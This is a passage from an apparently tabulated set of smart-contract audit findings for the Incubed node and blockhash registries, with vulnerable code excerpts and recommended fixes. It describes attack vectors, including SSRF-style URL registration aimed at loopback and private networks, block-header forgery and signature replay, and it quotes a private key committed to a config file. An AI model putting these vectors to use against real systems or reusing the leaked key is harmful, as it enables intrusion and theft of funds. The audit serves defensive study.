}\\n\\n // copy calldata to memory\\n calldatacopy(\\n freeMemPtr,\\n calldataOffset,\\n calldatasize()\\n )\\n```\\n" +"NodeRegistry - URL can be arbitrary dns resolvable names, IP's and even localhost or private subnets",high,"As outlined in issue 6.9 the `NodeRegistry` allows anyone to register nodes 
with arbitrary URLs. The `url` is then used by `in3-server` or clients to connect to other nodes in the system. Signers can only be convicted if they sign wrong blockhashes. However, if they never provide any signatures they can stay in the registry for as long as they want and sabotage the network. The Registry implements an admin functionality that is available for the first year to remove misbehaving nodes (or spam entries) from the Registry. However, this is insufficient as an attacker might just re-register nodes after the minimum timeout they specify or spend some more finneys on registering more nodes. Depending on the eth-price this will be more or less profitable.\\nFrom an attackers perspective the `NodeRegistry` is a good source of information for reconnaissance, allows to de-anonymize and profile nodes based on dns entries or netblocks or responses to `in3_stats` (https://github.com/ConsenSys/slockit-in3-audit-2019-09/issues/49), makes a good list of target for DoS attacks on the system or makes it easy to exploit nodes for certain yet unknown security vulnerabilities.\\nSince nodes and potentially clients (not in scope) do not validate the rpc URL received from the `NodeRegistry` they will try to connect to whatever is stored in a nodes `url` entry.\\ncode/in3-server/src/chains/signatures.ts:L58-L75\\n```\\nconst config = nodes.nodes.find(\\_ => \\_.address.toLowerCase() === adr.toLowerCase())\\nif (!config) // TODO do we need to throw here or is it ok to simply not deliver the signature?\\n throw new Error('The ' + adr + ' does not exist within the current registered active nodeList!')\\n\\n// get cache signatures and remaining blocks that have no signatures\\nconst cachedSignatures: Signature[] = []\\nconst blocksToRequest = blocks.filter(b => {\\n const s = signatureCaches.get(b.hash) && false\\n return s ? 
cachedSignatures.push(s) \\* 0 : true\\n})\\n\\n// send the sign-request\\nlet response: RPCResponse\\ntry {\\n response = (blocksToRequest.length\\n ? await handler.transport.handle(config.url, { id: handler.counter++ || 1, jsonrpc: '2.0', method: 'in3\\_sign', params: blocksToRequest })\\n : { result: [] }) as RPCResponse\\n if (response.error) {\\n```\\n\\nThis allows for a wide range of attacks not limited to:\\nAn attacker might register a node with an empty or invalid URL. The `in3-server` does not validate the URL and therefore will attempt to connect to the invalid URL, spending resources (cpu, file-descriptors, ..) to find out that it is invalid.\\nAn attacker might register a node with a URL that is pointing to another node's rpc endpoint and specify weights that suggest that it is capable of service a lot of requests to draw more traffic towards that node in an attempt to cause a DoS situation.\\nAn attacker might register a node for a http/https website at any port in an extortion attempt directed to website owners. The incubed network nodes will have to learn themselves that the URL is invalid and they will at least attempt to connect the website once.\\nAn attacker might update the node information in the `NodeRegistry` for a specific node every block, providing a new `url` (or a slightly different URLs issue 6.9) to avoid client/node URL blacklists.\\nAn attacker might provide IP addresses instead of DNS resolvable names with the `url` in an attempt to draw traffic to targets, avoiding canonicalization and blacklisting features.\\nAn attacker might provide a URL that points to private IP netblocks for IPv4 or IPv6 in various formats. 
Combined with the ability to ask another node to connect to an attacker defined `url` (via blockproof, signatures[] -> signer_address -> signer.url) this might allow an attacker to enumerate services in the LAN of node operators.\\nAn attacker might provide the loopback IPv4, IPv6 or resolvable name as the URL in an attempt to make the node connect to local loopback services (service discovery, bypassing authentication for some local running services - however this is very limited to the requests nodes may execute).\\nURLs may be provided in various formats: resolvable dns names, IPv4, IPv6 and depending on the http handler implementation even in Decimal, Hex or Octal form (i.e. http://2130706433/)\\nA valid DNS resolvable name might point to a localhost or private IP netblock.\\nSince none of the rpc endpoints provide signatures they cannot be convicted or removed (unless the `unregisterKey` does it within the first year. However, that will not solve the problem that someone can re-register the same URLs over and over again)","Resolution\\nThis issue has been addressed with the following commits:\\nIt is a design decision to base the Node registry on URLs (DNS resolvable names). This has the implications outlined in this issue and they cannot easily be mitigated. Adding a delay until nodes can be used after registration only delays the problem. Assuming that an entity curates the registry or a whitelist is in place centralizes the system. Adding DNS record verification still allows an owner of a DNS entry to point its name to any IP address they would like it to point to. It certainly makes it harder to add RPC URLs with DNS names that are not in control of the attacker but it also adds a whole lot more complexity to the system (including manual steps performed by the node operator). 
In the end, the system allows IP based URLs in the registry which cannot be used for DNS validation.\\nIt is a fundamental design decision of the system architecture to allow rpc urls in the Node Registry, therefore this issue can only be partially mitigated unless the system design is reworked. It is therefore suggested to add checks to both the registry contract (coarse validation to avoid adding invalid urls) and node implementations (rigorous validation of URL's and resolved IP addresses) and filter out any potentially harmful destinations.",,"```\\nconst config = nodes.nodes.find(\\_ => \\_.address.toLowerCase() === adr.toLowerCase())\\nif (!config) // TODO do we need to throw here or is it ok to simply not deliver the signature?\\n throw new Error('The ' + adr + ' does not exist within the current registered active nodeList!')\\n\\n// get cache signatures and remaining blocks that have no signatures\\nconst cachedSignatures: Signature[] = []\\nconst blocksToRequest = blocks.filter(b => {\\n const s = signatureCaches.get(b.hash) && false\\n return s ? cachedSignatures.push(s) \\* 0 : true\\n})\\n\\n// send the sign-request\\nlet response: RPCResponse\\ntry {\\n response = (blocksToRequest.length\\n ? await handler.transport.handle(config.url, { id: handler.counter++ || 1, jsonrpc: '2.0', method: 'in3\\_sign', params: blocksToRequest })\\n : { result: [] }) as RPCResponse\\n if (response.error) {\\n```\\n" +in3-server - key management Pending,high,"Secure and efficient key management is a challenge for any cryptographic system. Incubed nodes for example require an account on the ethereum blockchain to actively participate in the incubed network. 
The account and therefore a private-key is used to sign transactions on the ethereum blockchain and to provide signed proofs to other in3-nodes.\\nThis means that an attacker that is able to discover the keys used by an `in3-server` by any mechanism may be able to impersonate that node, steal the node's funds or sign wrong data on behalf of the node which might also lead to a loss of funds.\\nThe private key for the `in3-server` can be specified in a configuration file called `config.json` residing in the program working dir. Settings from the `config.json` can be overridden via command-line options. The application keeps configuration parameters available internally in an `IN3RPCConfig` object and passes this object as an initialization parameter to other objects.\\nThe key can either be provided in plaintext as a hex-string starting with `0x` or within an ethereum keystore format compatible protected keystore file. Either way it is provided, it will be held in plaintext in the object.\\nThe application accepts plaintext private keys and the keys are stored unprotected in the application's memory in JavaScript objects. The `in3-server` might even re-use the node's private key which may weaken the security provided by the node. The repository leaks a series of presumably 'test private keys' and the default config file already comes with a private key set that might be shared across unwary users who fail to override it.\\ncode/in3-server/config.json:L1-L4\\n```\\n{\\n ""privateKey"": ""0xc858a0f49ce12df65031ba0eb0b353abc74f93f8ccd43df9682fd2e2293a4db3"",\\n ""rpcUrl"": ""http://rpc-kovan.slock.it""\\n}\\n```\\n\\ncode/in3-server/package.json:L20-L31\\nThe private key is also passed as arguments to other functions. In error cases these may leak the private key to log interfaces or remote log aggregation instances (sentry). 
See `txargs.privateKey` in the example below:\\ncode/in3-server/src/util/tx.ts:L100-L100\\n```\\nconst key = toBuffer(txargs.privateKey)\\n```\\n\\ncode/in3-server/src/util/tx.ts:L134-L140\\n```\\nconst txHash = await transport.handle(url, {\\n jsonrpc: '2.0',\\n id: idCount++,\\n method: 'eth\\_sendRawTransaction',\\n params: [toHex(tx.serialize())]\\n}).then((\\_: RPCResponse) => \\_.error ? Promise.reject(new SentryError('Error sending tx', 'tx\\_error', 'Error sending the tx ' + JSON.stringify(txargs) + ':' + JSON.stringify(\\_.error))) as any : \\_.result + '')\\n```\\n","Resolution\\nThe breakdown of the fixes addressed with git.slock.it/PR/13 are as follows:\\nKeys should never be stored or accepted in plaintext format Keys should only be accepted in an encrypted and protected format\\nThe private key in `code/in3-server/config.json` has been removed. The repository still contains private keys at least in the following locations:\\n`package.json`\\n`vscode/launch.json`\\n`example_docker-compose.yml`\\nNote that private keys indexed by a git repository can be restored from the repository history.\\nThe following statement has been provided to address this issue:\\nWe have removed all examples and usage of plain private keys and replaced them with json-keystore files. Also in the documentation we added warnings on how to deal with keys, especially with hints to the bash history or enviroment\\n\\nA single key should be used for only one purpose. Keys should not be shared.\\nThe following statement has been provided to address this issue:\\nThis is why we seperated the owner and signer-key. This way you can use a multisig to securly protect the owner-key. 
The signer-key is used to sign blocks (and convict) and is not able to do anything else (not even changing its own url)\\n\\nThe application should support developers in understanding where cryptographic keys are stored within the application as well as in which memory regions they might be accessible for other applications\\nAddressed by wrapping the private key in an object that stores the key in encrypted form and only decrypts it when signing. The key is cleared after usage. The IN3-server still allows raw private keys to be configured. A warning is printed if that is the case. The loaded raw private key is temporarily assigned to a local variable and not explicitly cleared by the method.\\nWhile we used to keep the unlocked key as part of the config, we have now removed the key from the config and store them in a special signer-function.\\nhttps://git.slock.it/in3/ts/in3-server/merge_requests/113\\n\\nKeys should be protected in memory and only decrypted for the duration of time they are actively used. Keys should not be stored with the applications source-code repository\\nsee previous remediation note.\\nAfter unlocking the signer key, we encrypt it again and keep it encrypted only decrypting it when signing. This way the raw private key only exist for a very short time in memory and will be filled with 0 right after. ( https://git.slock.it/in3/ts/in3-server/merge_requests/113/diffs#653b04fa41e35b55181776b9f14620b661cff64c_54_73 )\\n\\nUse standard libraries for cryptographic operations\\nThe following statement has been provided to address this issue\\nWe are using ethereumjs-libs.\\n\\nUse the system keystore and API to sign and avoid to store key material at all\\nThe following statement has been provided to address this issue\\nWe are looking into using different signer-apis, even supporting hardware-modules like HSMs. 
But this may happen in future releases.\\n\\nThe application should store the keys eth-address (util.getAddress()) instead of re-calculating it multiple times from the private key.\\nFixed by generating the address for a private key once and storing it in a private key wrapper object.\\n\\nDo not leak credentials and key material in debug-mode, to local log-output or external log aggregators.\\n`txArgs` still contains a field `privateKey` as outlined in the issue description. However, this `privateKey` now represents the wrapper object noted in a previous comment which only provides access to the ETH address generated from the raw private key.\\nThe following statement has been provided to address this issue:\\nsince the private key and the passphrase are actually deleted from the config, logoutputs or even debug will not be able to leak this information.\\nKeys should never be stored or accepted in plaintext format.\\nKeys should not be stored in plaintext on the file-system as they might easily be exposed to other users. Credentials on the file-system must be tightly restricted by access control.\\nKeys should not be provided as plaintext via environment variables as this might make them available to other processes sharing the same environment (child-processes, e.g. same shell session)\\nKeys should not be provided as plaintext via command-line arguments as they might persist in the shell's command history or might be available to privileged system accounts that can query other processes startup parameters.\\nKeys should only be accepted in an encrypted and protected format.\\nA single key should be used for only one purpose. 
Keys should not be shared.\\nThe use of the same key for two different cryptographic processes may weaken the security provided by one or both of the processes.\\nThe use of the same key for two different applications may weaken the security provided by one or both of the applications.\\nLimiting the use of a key limits the damage that could be done if the key is compromised.\\nNode owners keys should not be re-used as signer keys.\\nThe application should support developers in understanding where cryptographic keys are stored within the application as well as in which memory regions they might be accessible for other applications.\\nKeys should be protected in memory and only decrypted for the duration of time they are actively used.\\nKeys should not be stored with the applications source-code repository.\\nUse standard libraries for cryptographic operations.\\nUse the system keystore and API to sign and avoid to store key material at all.\\nThe application should store the keys eth-address (util.getAddress()) instead of re-calculating it multiple times from the private key.\\nDo not leak credentials and key material in debug-mode, to local log-output or external log aggregators.",,"```\\n{\\n ""privateKey"": ""0xc858a0f49ce12df65031ba0eb0b353abc74f93f8ccd43df9682fd2e2293a4db3"",\\n ""rpcUrl"": ""http://rpc-kovan.slock.it""\\n}\\n```\\n" +NodeRegistry - Multiple nodes can share slightly different RPC URL,high,"One of the requirements for Node registration is to have a unique URL which is not already used by a different owner. The uniqueness check is done by hashing the provided `_url` and checking if someone already registered with that hash of `_url`.\\nHowever, byte-equality checks (via hashing in this case) to enforce uniqueness will not work for URLs. 
For example, while the following URLs are not equal and will result in different `urlHashes` they can logically be the same end-point:\\n`https://some-server.com/in3-rpc`\\n`https://some-server.com:443/in3-rpc`\\n`https://some-server.com/in3-rpc/`\\n`https://some-server.com/in3-rpc///`\\n`https://some-server.com/in3-rpc?something`\\n`https://some-server.com/in3-rpc?something&something`\\n`https://www.some-server.com/in3-rpc?something` (if www resolves to the same ip)\\n```\\nbytes32 urlHash = keccak256(bytes(\\_url));\\n\\n// make sure this url and also this owner was not registered before.\\n// solium-disable-next-line\\nrequire(!urlIndex[urlHash].used && signerIndex[\\_signer].stage == Stages.NotInUse,\\n ""a node with the same url or signer is already registered"");\\n```\\n\\nThis leads to the following attack vectors:\\nA user signs up multiple nodes that resolve to the same end-point (URL). A minimum deposit of `0.01 ether` is required for each registration. Registering multiple nodes for the same end-point might allow an attacker to increase their chance of being picked to provide proofs. Registering multiple nodes requires unique `signer` addresses per node.\\nAlso one node can have multiple accounts, hence one node can have slightly different URL and different accounts as the signers.\\nDoS - A user might register nodes for URLs that do not serve in3-clients in an attempt to DDoS e.g. in an attempt to extort web-site operators. This is kind of a reflection attack where nodes will request other nodes from the contract and try to contact them over RPC. Since it is http-rpc it will consume resources on the receiving end.\\nDoS - A user might register Nodes with RPC URLs of other nodes, manipulating weights to cause more traffic than the node can actually handle. Nodes will try to communicate with that node. If no proof is requested the node will not even know that someone else signed up other nodes with their RPC URL to cause problems. 
If they request proof the original `signer` will return a signed proof and the node will fail due to a signature mismatch. However, the node cannot be convicted and therefore forced to lose the deposit as conviction is bound the `signer` and the block was not signed by the rogue node entry. There will be no way to remove the node from the registry other than the admin functionality.","Canonicalize URLs, but that will not completely prevent someone from registering nodes for other end-points or websites. Nodes can be removed by an admin in the first year but not after that. Rogue owners cannot be prevented from registering random nodes with high weights and minimum deposit. They cannot be convicted as they do not serve proofs. Rogue owners can still unregister to receive their deposit after messing with the system.",,"```\\nbytes32 urlHash = keccak256(bytes(\\_url));\\n\\n// make sure this url and also this owner was not registered before.\\n// solium-disable-next-line\\nrequire(!urlIndex[urlHash].used && signerIndex[\\_signer].stage == Stages.NotInUse,\\n ""a node with the same url or signer is already registered"");\\n```\\n" +Impossible to remove malicious nodes after the initial period,medium,"The system has centralized power structure for the first year after deployment. 
An `unregisterKey` (creator of the contract) is allowed to remove Nodes that are in state `Stages.Active` from the registry, only in 1st year.\\nHowever, there is no possibility to remove malicious nodes from the registry after that.\\n```\\n/// @dev only callable in the 1st year after deployment\\nfunction removeNodeFromRegistry(address \\_signer)\\n external\\n onlyActiveState(\\_signer)\\n{\\n\\n // solium-disable-next-line security/no-block-members\\n require(block.timestamp < (blockTimeStampDeployment + YEAR\\_DEFINITION), ""only in 1st year"");// solhint-disable-line not-rely-on-time\\n require(msg.sender == unregisterKey, ""only unregisterKey is allowed to remove nodes"");\\n\\n SignerInformation storage si = signerIndex[\\_signer];\\n In3Node memory n = nodes[si.index];\\n\\n unregisterNodeInternal(si, n);\\n\\n}\\n```\\n","Resolution\\nThis issue has been addressed with a large change-set that splits the NodeRegistry into two contracts, which results in a code flow that mitigates this issue by making the logic contract upgradable (after 47 days of notice). The resolution adds more complexity to the system, and this complexity is not covered by the original audit. Splitting up the contracts has the side-effect of events being emitted by two different contracts, requiring nodes to subscribe to both contracts' events.\\nThe need for removing malicious nodes from the registry, arises from the design decision to allow anyone to register any URL. These URLs might not actually belong to the registrar of the URL and might not be IN3 nodes. This is partially mitigated by a centralization feature introduced in the mitigation phase that implements whitelist functionality for adding nodes.\\nWe generally advocate against adding complexity, centralization and upgrading mechanisms that can allow one party to misuse functionalities of the contract system for their benefit (e.g. 
`adminSetNodeDeposit` is only used to reset the deposit but allows the Logic contract to set any deposit; the logic contract is set by the owner and there is a 47 day timelock).\\nWe believe the solution to this issue, should have not been this complex. The trust model of the system is changed with this solution, now the logic contract can allow the admin a wide range of control over the system state and data.\\nThe following statement has been provided with the change-set:\\nDuring the 1st year, we will keep the current mechanic even though it's a centralized approach. However, we changed the structure of the smart contracts and separated the NodeRegistry into two different smart contracts: NodeRegistryLogic and NodeRegistryData. After a successful deployment only the NodeRegistryLogic-contract is able to write data into the NodeRegistryData-contract. This way, we can keep the stored data (e.g. the nodeList) in the NodeRegistryData-contract while changing the way the data gets added/updated/removed is handled in the NodeRegistryLogic-contract. We also provided a function to update the NodeRegistryLogic-contract, so that we are able to change to a better solution for removing nodes in an updated contract.\\nProvide a solution for the network to remove fraudulent node entries. 
This could be done by voting mechanism (with staking, etc).",,"```\\n/// @dev only callable in the 1st year after deployment\\nfunction removeNodeFromRegistry(address \\_signer)\\n external\\n onlyActiveState(\\_signer)\\n{\\n\\n // solium-disable-next-line security/no-block-members\\n require(block.timestamp < (blockTimeStampDeployment + YEAR\\_DEFINITION), ""only in 1st year"");// solhint-disable-line not-rely-on-time\\n require(msg.sender == unregisterKey, ""only unregisterKey is allowed to remove nodes"");\\n\\n SignerInformation storage si = signerIndex[\\_signer];\\n In3Node memory n = nodes[si.index];\\n\\n unregisterNodeInternal(si, n);\\n\\n}\\n```\\n" +NodeRegistry.registerNodeFor() no replay protection and expiration Won't Fix,medium,"An owner can register a node with the signer not being the owner by calling `registerNodeFor`. The owner submits a message signed for the owner including the properties of the node including the url.\\nThe signed data does not include the `registryID` nor the NodeRegistry's address and can therefore be used by the owner to submit the same node to multiple registries or chains without the signers consent.\\nThe signed data does not expire and can be re-used by the owner indefinitely to submit the same node again to future contracts or the same contract after the node has been removed.\\nArguments are not validated in the external function (also see issue 6.17)\\n```\\nbytes32 tempHash = keccak256(\\n abi.encodePacked(\\n \\_url,\\n \\_props,\\n \\_timeout,\\n \\_weight,\\n msg.sender\\n )\\n);\\n```\\n",Include `registryID` and an expiration timestamp that is checked in the contract with the signed data. 
Validate function arguments.,,"```\\nbytes32 tempHash = keccak256(\\n abi.encodePacked(\\n \\_url,\\n \\_props,\\n \\_timeout,\\n \\_weight,\\n msg.sender\\n )\\n);\\n```\\n" +BlockhashRegistry - Structure of provided blockheaders should be validated,medium,"`getParentAndBlockhash` takes an rlp-encoded blockheader blob, extracts the parent parent hash and returns both the parent hash and the calculated blockhash of the provided data. The method is used to add blockhashes to the registry that are older than 256 blocks as they are not available to the evm directly. This is done by establishing a trust-chain from a blockhash that is already in the registry up to an older block\\nThe method assumes that valid rlp encoded data is provided but the structure is not verified (rlp decodes completely; block number is correct; timestamp is younger than prevs, …), giving a wide range of freedom to an attacker with enough hashing power (or exploiting potential future issues with keccak) to forge blocks that would never be accepted by clients, but may be accepted by this smart contract. (threat: mining pool forging arbitrary non-conformant blocks to exploit the BlockhashRegistry)\\nIt is not checked that input was actually provided. However, accessing an array at an invalid index will raise an exception in the EVM. Providing a single byte > `0xf7` will yield a result and succeed even though it would have never been accepted by a real node.\\nIt is assumed that the first byte is the rlp encoded length byte and an offset into the provided `_blockheader` bytes-array is calculated. Memory is subsequently accessed via a low-level `mload` at this calculated offset. However, it is never validated that the offset actually lies within the provided range of bytes `_blockheader` leading to an out-of-bounds memory read access.\\nThe rlp encoded data is only partially decoded. For the first rlp list the number of length bytes is extracted. 
For the rlp encoded long string a length byte of 1 is assumed. The inline comment appears to be inaccurate or might be misleading. `// we also have to add ""2"" = 1 byte to it to skip the length-information`\\nInvalid intermediary blocks (e.g. with parent hash 0x00) will be accepted potentially allowing an attacker to optimize the effort needed to forge invalid blocks skipping to the desired blocknumber overwriting a certain blockhash (see issue 6.18)\\nWith one collisions (very unlikely) an attacker can add arbitrary or even random values to the BlockchainRegistry. The parent-hash of the starting blockheader cannot be verified by the contract ([target_block_random]<--parent_hash--[rnd]<--parent_hash--[rnd]<--parent_hash--...<--parent_hash--[collision]<--parent_hash_collission--[anchor_block]). While nodes can verify block structure and bail on invalid structure and check the first blocks hash and make sure the chain is in-tact the contract can't. Therefore one cannot assume the same trust in the blockchain registry when recreating blocks compared to running a full node.\\n```\\nfunction getParentAndBlockhash(bytes memory \\_blockheader) public pure returns (bytes32 parentHash, bytes32 bhash) {\\n\\n /// we need the 1st byte of the blockheader to calculate the position of the parentHash\\n uint8 first = uint8(\\_blockheader[0]);\\n\\n /// calculates the offset\\n /// by using the 1st byte (usually f9) and substracting f7 to get the start point of the parentHash information\\n /// we also have to add ""2"" = 1 byte to it to skip the length-information\\n require(first > 0xf7, ""invalid offset"");\\n uint8 offset = first - 0xf7 + 2;\\n\\n /// we are using assembly because it's the most efficent way to access the parent blockhash within the rlp-encoded blockheader\\n // solium-disable-next-line security/no-inline-assembly\\n assembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n mstore(0x20, 
\\_blockheader)\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n mload(0x20), 0x20\\n ), offset)\\n )\\n }\\n bhash = keccak256(\\_blockheader);\\n```\\n",Validate that the provided data is within a sane range of bytes that is expected (min/max blockheader sizes).\\nValidate that the provided data is actually an rlp encoded blockheader.\\nValidate that the offset for the parent Hash is within the provided data.\\nValidate that the parent Hash is non zero.\\nValidate that blockhashes do not repeat.,,"```\\nfunction getParentAndBlockhash(bytes memory \\_blockheader) public pure returns (bytes32 parentHash, bytes32 bhash) {\\n\\n /// we need the 1st byte of the blockheader to calculate the position of the parentHash\\n uint8 first = uint8(\\_blockheader[0]);\\n\\n /// calculates the offset\\n /// by using the 1st byte (usually f9) and substracting f7 to get the start point of the parentHash information\\n /// we also have to add ""2"" = 1 byte to it to skip the length-information\\n require(first > 0xf7, ""invalid offset"");\\n uint8 offset = first - 0xf7 + 2;\\n\\n /// we are using assembly because it's the most efficent way to access the parent blockhash within the rlp-encoded blockheader\\n // solium-disable-next-line security/no-inline-assembly\\n assembly { // solhint-disable-line no-inline-assembly\\n // mstore to get the memory pointer of the blockheader to 0x20\\n mstore(0x20, \\_blockheader)\\n\\n // we load the pointer we just stored\\n // then we add 0x20 (32 bytes) to get to the start of the blockheader\\n // then we add the offset we calculated\\n // and load it to the parentHash variable\\n parentHash :=mload(\\n add(\\n add(\\n mload(0x20), 0x20\\n ), offset)\\n )\\n }\\n bhash = keccak256(\\_blockheader);\\n```\\n" +Registries - Incomplete input validation 
and inconsistent order of validations Pending,medium,"Methods and Functions usually live in one of two worlds:\\n`public` API - methods declared with visibility `public` or `external` exposed for interaction by other parties\\n`internal` API - methods declared with visibility `internal`, `private` that are not exposed for interaction by other parties\\nWhile it is good practice to visually distinguish internal from public API by following commonly accepted naming convention e.g. by prefixing internal functions with an underscore (_doSomething vs. doSomething) or adding the keyword `unsafe` to `unsafe` functions that are not performing checks and may have a dramatic effect to the system (_unsafePayout vs. RequestPayout), it is important to properly verify that inputs to methods are within expected ranges for the implementation.\\nInput validation checks should be explicit and well documented as part of the code's documentation. This is to make sure that smart-contracts are robust against erroneous inputs and reduce the potential attack surface for exploitation.\\nIt is good practice to verify the methods input as early as possible and only perform further actions if the validation succeeds. 
Methods can be split into an external or public API that performs initial checks and subsequently calls an internal method that performs the action.\\nThe following lists some public API methods that are not properly checking the provided data:\\n`BlockhashRegistry.reCalculateBlockheaders` - bhash can be zero; blockheaders can be empty\\nBlockhashRegistry.getParentAndBlockhash- blockheader structure can be random as long as parenthash can be extracted\\n`BlockhashRegistry.recreateBlockheaders` - blockheaders can be empty; Arguments should be validated before calculating values that depend on them:\\n```\\nassert(\\_blockNumber > \\_blockheaders.length);\\n```\\n\\n`BlockhashRegistry.searchForAvailableBlock` - `_startNumber + _numBlocks` can be > `block.number; _startNumber + _numBlocks` can overflow.\\n`NodeRegistry.removeNode` - should check `require(_nodeIndex < nodes.length)` first before any other action.\\n```\\nfunction removeNode(uint \\_nodeIndex) internal {\\n // trigger event\\n emit LogNodeRemoved(nodes[\\_nodeIndex].url, nodes[\\_nodeIndex].signer);\\n // deleting the old entry\\n delete urlIndex[keccak256(bytes(nodes[\\_nodeIndex].url))];\\n uint length = nodes.length;\\n\\n assert(length > 0);\\n```\\n\\n`NodeRegistry.registerNodeFor` - Signature version `v` should be checked to be either `27 || 28` before verifying it.\\n```\\nfunction registerNodeFor(\\n string calldata \\_url,\\n uint64 \\_props,\\n uint64 \\_timeout,\\n address \\_signer,\\n uint64 \\_weight,\\n uint8 \\_v,\\n bytes32 \\_r,\\n bytes32 \\_s\\n)\\n external\\n payable\\n{\\n```\\n\\n`NodeRegistry.revealConvict` - unchecked `signer`\\n```\\nSignerInformation storage si = signerIndex[\\_signer];\\n```\\n\\n`NodeRegistry.revealConvict` - signer status can be checked earlier.\\n```\\nrequire(si.stage != Stages.Convicted, ""node already convicted"");\\n```\\n\\n`NodeRegistry.updateNode` - the check if the `newURL` is registered can be done earlier\\n```\\nrequire(!urlIndex[newURl].used, 
""url is already in use"");\\n```\\n",Use Checks-Effects-Interactions pattern for all functions.,,```\\nassert(\\_blockNumber > \\_blockheaders.length);\\n```\\n +BlockhashRegistry - recreateBlockheaders allows invalid parent hashes for intermediary blocks,medium,"It is assumed that a blockhash of `0x00` is invalid, but the method accepts intermediary parent hashes extracted from blockheaders that are zero when establishing the trust chain.\\n`recreateBlockheaders` relies on `reCalculateBlockheaders` to correctly establish a chain of trust from the provided list of `_blockheaders` to a valid blockhash stored in the contract. However, `reCalculateBlockheaders` fails to raise an exception in case `getParentAndBlockhash` returns a blockhash of `0x00`. Subsequently it will skip over invalid blockhashes and continue to establish the trust chain without raising an error.\\nThis may allow an attacker with enough hashing power to store a blockheader hash that is actually invalid on the real chain but accepted within this smart contract. 
This may even only be done temporarily to overwrite an existing hash for a short period of time (see https://github.com/ConsenSys/slockit-in3-audit-2019-09/issues/24).\\n```\\nfor (uint i = 0; i < \\_blockheaders.length; i++) {\\n (calcParent, calcBlockhash) = getParentAndBlockhash(\\_blockheaders[i]);\\n if (calcBlockhash != currentBlockhash) {\\n return 0x0;\\n }\\n currentBlockhash = calcParent;\\n}\\n```\\n",Stop processing the array of `_blockheaders` immediately if a blockheader is invalid.,,"```\\nfor (uint i = 0; i < \\_blockheaders.length; i++) {\\n (calcParent, calcBlockhash) = getParentAndBlockhash(\\_blockheaders[i]);\\n if (calcBlockhash != currentBlockhash) {\\n return 0x0;\\n }\\n currentBlockhash = calcParent;\\n}\\n```\\n" +BlockhashRegistry - recreateBlockheaders succeeds and emits an event even though no blockheaders have been provided,medium,"The method is used to re-create blockhashes from a list of rlp-encoded `_blockheaders`. However, the method never checks if `_blockheaders` actually contains items. 
The result is, that the method will unnecessarily store the same value that is already in the `blockhashMapping` at the same location and wrongly log `LogBlockhashAdded` even though nothing has been added nor changed.\\nassume `_blockheaders` is empty and the registry already knows the blockhash of `_blockNumber`\\n```\\nfunction recreateBlockheaders(uint \\_blockNumber, bytes[] memory \\_blockheaders) public {\\n\\n bytes32 currentBlockhash = blockhashMapping[\\_blockNumber];\\n require(currentBlockhash != 0x0, ""parentBlock is not available"");\\n\\n bytes32 calculatedHash = reCalculateBlockheaders(\\_blockheaders, currentBlockhash);\\n require(calculatedHash != 0x0, ""invalid headers"");\\n```\\n\\nAn attempt is made to re-calculate the hash of an empty `_blockheaders` array (also passing the `currentBlockhash` from the registry)\\n```\\nbytes32 calculatedHash = reCalculateBlockheaders(\\_blockheaders, currentBlockhash);\\n```\\n\\nThe following loop in `reCalculateBlockheaders` is skipped and the `currentBlockhash` is returned.\\n```\\nfunction reCalculateBlockheaders(bytes[] memory \\_blockheaders, bytes32 \\_bHash) public pure returns (bytes32 bhash) {\\n\\n bytes32 currentBlockhash = \\_bHash;\\n bytes32 calcParent = 0x0;\\n bytes32 calcBlockhash = 0x0;\\n\\n /// save to use for up to 200 blocks, exponential increase of gas-usage afterwards\\n for (uint i = 0; i < \\_blockheaders.length; i++) {\\n (calcParent, calcBlockhash) = getParentAndBlockhash(\\_blockheaders[i]);\\n if (calcBlockhash != currentBlockhash) {\\n return 0x0;\\n }\\n currentBlockhash = calcParent;\\n }\\n\\n return currentBlockhash;\\n```\\n\\nThe assertion does not fire, the `bnr` to store the `calculatedHash` is the same as the one initially provided to the method as an argument.. 
Nothing has changed but an event is emitted.\\n```\\n /// we should never fail this assert, as this would mean that we were able to recreate a invalid blockchain\\n assert(\\_blockNumber > \\_blockheaders.length);\\n uint bnr = \\_blockNumber - \\_blockheaders.length;\\n blockhashMapping[bnr] = calculatedHash;\\n emit LogBlockhashAdded(bnr, calculatedHash);\\n}\\n```\\n","The method is crucial for the system to work correctly and must be tightly controlled by input validation. It should not be allowed to overwrite an existing value in the contract (issue 6.29) or emit an event even though nothing has happened. Therefore validate that user provided input is within safe bounds. In this case, that at least one `_blockheader` has been provided. Validate that `_blockNumber` is less than `block.number` and do not expect that parts of the code will throw and save the contract from exploitation.",,"```\\nfunction recreateBlockheaders(uint \\_blockNumber, bytes[] memory \\_blockheaders) public {\\n\\n bytes32 currentBlockhash = blockhashMapping[\\_blockNumber];\\n require(currentBlockhash != 0x0, ""parentBlock is not available"");\\n\\n bytes32 calculatedHash = reCalculateBlockheaders(\\_blockheaders, currentBlockhash);\\n require(calculatedHash != 0x0, ""invalid headers"");\\n```\\n" +NodeRegistry.updateNode replaces signer with owner and emits inconsistent events,medium,"When the `owner` calls `updateNode()` function providing a new `url` for the node, the `signer` of the `url` is replaced by `msg.sender` which in this case is the `owner` of the node.
Note that new URL can resolve to the same URL as before (See https://github.com/ConsenSys/slockit-in3-audit-2019-09/issues/36).\\n```\\nif (newURl != keccak256(bytes(node.url))) {\\n\\n // deleting the old entry\\n delete urlIndex[keccak256(bytes(node.url))];\\n\\n // make sure the new url is not already in use\\n require(!urlIndex[newURl].used, ""url is already in use"");\\n\\n UrlInformation memory ui;\\n ui.used = true;\\n ui.signer = msg.sender;\\n urlIndex[newURl] = ui;\\n node.url = \\_url;\\n}\\n```\\n\\nFurthermore, the method emits a `LogNodeRegistered` event when the node structure is updated. However, the event will always emit `msg.sender` as the signer even though that might not be true. For example, if the `url` does not change, the signer can still be another account that was previously registered with `registerNodeFor` and is not necessarily the `owner`.\\n```\\nemit LogNodeRegistered(\\n node.url,\\n \\_props,\\n msg.sender,\\n node.deposit\\n);\\n```\\n\\n```\\nevent LogNodeRegistered(string url, uint props, address signer, uint deposit);\\n```\\n","The `updateNode()` function gets the `signer` as an input used to reference the node structure and this `signer` should be set for the `UrlInformation`.\\n```\\nfunction updateNode(\\n address \\_signer,\\n string calldata \\_url,\\n uint64 \\_props,\\n uint64 \\_timeout,\\n uint64 \\_weight\\n )\\n```\\n\\nThe method should actually only allow to change node properties when 